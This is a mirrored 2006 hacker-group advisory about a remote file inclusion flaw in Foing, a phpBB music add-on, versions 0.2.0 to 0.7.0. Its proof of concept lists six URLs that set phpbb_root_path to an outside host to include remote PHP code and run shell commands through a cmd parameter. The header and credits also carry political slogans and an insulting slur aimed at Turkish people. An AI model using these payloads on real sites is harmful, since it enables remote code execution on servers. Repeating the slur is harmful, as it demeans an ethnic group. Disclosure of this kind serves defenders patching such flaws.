Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12654
HistoryMay 13, 2006 - 12:00 a.m.

[Kurdish Security # 7] Foing Remote File Include Vulnerability [PHPBB]

2006-05-1300:00:00
vulners.com
20

Kurdish Security Advisory

Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html

Foing Remote File Include Vulnerability [PHPBB] :}

"Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan

STOP THE MASSACRE IN THE TURKEY! FREEDOM FOR KURDISTAN !

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com & [email protected]

Risk : High

Class : Remote

Script : Foing

Script Website : http://foing.sourceforge.net/

Version : Foing 0.7.0

              0.6.0   
              0.5.0
              0.4.0
              0.3.0
              0.2.0

w0rkz : "Powered by foing 0.7.0 © 2003, 2004 Foing Group"

      "Powered by foing 0.6.0 © 2003, 2004 Foing Group" etc..

Thanks : B3g0k, Nistiman, Flot, Netqurd, Darki, Azad, ColdHackers, Kurdistan Cyber Army etc…

Special Bitch : Turkish LameRz :]


cmd shell example:

cmd shell variable: ($_GET[cmd]);

Vulnerable code :

Get along at directory config.php

did you meet of …

<?php

define('FOING_INSTALLED', true);

$phpbb_root_path = '…/';
$foing_prefix = $table_prefix;

?>

Proof Of Concept :

http://www.r0xed.com/[foingpath]/index.php?phpbb_root_path=http://evilcode.txt?&amp;cmd=uname -a
http://www.r0xed.com/[foingpath]/song.php?phpbb_root_path=http://evilcode.txt?&amp;cmd=uname -a
http://www.r0xed.com/[foingpath]/faq.php?phpbb_root_path=http://evilcode.txt?&amp;cmd=uname -a
http://www.r0xed.com/[foingpath]/list.php?phpbb_root_path=http://evilcode.txt?&amp;cmd=uname -a
http://www.r0xed.com/[foingpath]/gen_m3u.php?phpbb_root_path=http://evilcode.txt?&amp;cmd=uname -a
http://www.r0xed.com/[foingpath]/playlist.php?phpbb_root_path=http://evilcode.txt?&amp;cmd=uname -a